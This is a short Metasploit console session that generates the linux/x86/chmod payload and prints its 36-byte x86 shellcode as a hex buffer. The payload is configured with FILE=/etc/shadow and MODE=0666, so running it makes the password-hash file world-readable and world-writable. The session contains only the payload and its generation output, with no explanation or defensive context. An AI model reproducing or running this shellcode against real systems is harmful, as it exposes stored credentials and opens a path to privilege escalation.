msf > use payload/linux/x86/chmod 
msf payload(chmod) > generate
# linux/x86/chmod - 36 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, FILE=/etc/shadow, MODE=0666
buf = 
"\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74\x63" +
"\x2f\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01\x00\x00" +
"\x59\xcd\x80\x6a\x01\x58\xcd\x80"

